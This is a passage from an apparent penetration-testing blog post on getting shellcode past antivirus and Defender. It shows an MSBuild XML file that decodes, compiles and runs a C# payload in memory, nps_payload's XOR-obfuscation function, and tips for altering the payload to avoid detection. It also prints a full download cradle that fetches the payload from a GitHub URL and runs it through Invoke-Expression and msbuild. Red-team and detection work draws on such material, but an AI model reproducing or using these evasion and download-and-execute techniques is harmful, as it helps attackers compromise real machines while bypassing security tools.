              parameters.GenerateInMemory = true;
              parameters.IncludeDebugInformation = false;
              CompilerResults results = nps.CompileAssemblyFromSource(parameters, Base64Decode(cmd));
              Assembly assembly = results.CompiledAssembly;
              object obj = assembly.CreateInstance("ClassExample");
              obj.GetType().InvokeMember("Execute", BindingFlags.InvokeMethod, null, obj, null);
              return true;
          }
          public static string Base64Encode(string text) {
              return System.Convert.ToBase64String(System.Text.Encoding.UTF8.GetBytes(text));
          }
          public static string Base64Decode(string encodedtext) {
              return System.Text.Encoding.UTF8.GetString(System.Convert.FromBase64String(encodedtext));
          }
        }]] >
      </Code>    
    </Task>  
  </UsingTask>
</Project>

 

Decode the string as Base64 and then play around with the C# code. What I did to get it working was simply move the use of System.Text as the first line as shown below:

using System;
using System.Runtime.InteropServices;
using System.Text;

public class ClassExample
{
    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_READWRITE = 0x04;
 
[…snipped…]

 

After modification:

using System.Text;
using System;
using System.Runtime.InteropServices;
 
public class ClassExample
{
    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_READWRITE = 0x04;
 
[…snipped…]

 

It’s a lot easier to edit the nps_payload.py source code directly in the ‘encode_csharppayload’ function definition and then generate the C# payload with the tool but this way might be more helpful to illustrate what the tools does and how it works.

Snippet below:

def encode_csharppayload(payload_file):
  global csharp_payload

  raw_file = open(payload_file, "rb")
  raw_b64 = base64.b64encode(raw_file.read())
  from itertools import cycle, izip
  import random, string
  key = ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits + string.ascii_lowercase) for _ in range(20))
  cryptedMessage = ''.join(chr(ord(c)^ord(k)) for c,k in izip(raw_b64, cycle(key)))
  str_shellcode = base64.b64encode(cryptedMessage.encode('utf-8'))
  raw_file.close()

  # Create launcher class
  launcher = """
using System.Text;
using System;
using System.Runtime.InteropServices;

public class ClassExample
{
    private static UInt32 MEM_COMMIT = 0x1000;
    private static UInt32 PAGE_READWRITE = 0x04;
    private static UInt32 PAGE_EXECUTE_READ = 0x20;

 

By the time you’re reading this, it may no longer work. Some things you could try at this point would be to use the method mentioned previously, remove references to nps, change parameter names (cmd for example), play around with various using directives, hardcode your own 20 character ‘key’ value within the ‘encode_csharppayload’ function.


A note on delivery: Invoke-CradleCrafter

This section wouldn’t be complete without a little discussion on how to deliver the XML file to the target system. If you had access to a terminal it would be easiest to just copy or create a new file and run the following command :

%windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe  <path_to_xml>

 

If you have command line access then a good tool to use at this point is Invoke-CradleCrafter. The tool is written by the same person that wrote Invoke-Obfuscation but focuses on generating various commands and techniques for the download aspect. The tool nicely differentiates between file-base methods and file-less methods. Of the three file-based methods I found BITSAdmin, PsBits and PsWebFile worked well against our corporate AV and Defender. Run it as follows:

Import the module and execute the tool:

import-module .\Invoke-CradleCrafter.psd1
invoke-cradlecrafter

 

You can type help or tutorial to get a list of options or commands.

Type disk to get the following options:

Select your delivery method, here I selected PSWEBFILE followed by invoke but you can play around with other options:

 I selected 2 for PS IEX:

This is very similar to the way Invoke-Obfuscation was written so you can type ‘show options’ to show what options you have (also ‘undo’ to undo the most recent changes). I set the POSTCRADLECOMMAND to the msbuild command so that you can execute it all in one go. I also uploaded the XML file to my GitHub account and set the URL to point to the raw file:

set url https://raw.githubusercontent.com/nnh100/uploads/master/payloads/nps_payload_mod.xml
set path c:\temp\tempbuild.xml
set postcradlecommand c:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe c:\windows\temp\tempbuild.xml

 

Type ‘show options’ and copy and paste the ObfuscatedCradle string into your command line:

(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/nnh100/uploads/master/payloads/nps_payload_mod.xml','c:\temp\tempbuild.xml');([String]::Join('',([Char[]](CONTENT c:\temp\tempbuild.xml -Enco 3))))|Invoke-Expression;c:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe c:\windows\temp\tempbuild.xml 

 

I should probably stop here. Whilst being far too long, I hope it has been useful and was somewhat structured.

UPDATE: This blog post was originally written in February/March. Unicorn V.3.7.6 was retested with the above techniques but it was still not possible to get past Defender.